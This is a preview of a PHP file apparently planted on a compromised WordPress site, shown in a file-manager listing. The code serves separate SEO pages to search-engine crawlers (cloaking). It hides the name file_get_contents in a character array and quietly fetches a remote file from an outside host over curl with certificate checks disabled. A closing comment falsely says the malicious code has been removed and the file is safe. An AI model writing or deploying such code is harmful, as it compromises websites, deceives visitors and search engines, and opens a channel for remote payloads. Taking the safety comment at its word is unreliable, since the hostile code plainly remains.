Preview: b73dfe25b4b8714c029b37a6ad3006fa.php
Size: 1.39 KB
/var/tmp/b73dfe25b4b8714c029b37a6ad3006fa.php
<?php
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$acceptLangRaw = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/';
$is_bot = preg_match('/(bot|crawl|spider|slurp|facebook|twitter|linkedin|embed)/i', $userAgent);
$browserLang = substr($acceptLangRaw, 0, 2);
$seo_content_path = __DIR__ . '/wp-content/home/index.html';
if ($is_bot && $requestUri === '/') {
if (file_exists($seo_content_path)) {
readfile($seo_content_path);
} else {
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
}
exit;
}
$load = '';
$zfj0304 = 'https://fcalpha.net/web/photo/20151024/thumb.txt';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;
$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
$fetch = @$load($zfj0304);
}
if($fetch === false && function_exists('curl_init')) {
$ch = curl_init();
$opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10];
curl_setopt_array($ch, $opts);
$fetch = curl_exec($ch);
curl_close($ch);
}
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
?>
Directory Contents
Dirs: 0 × Files: 56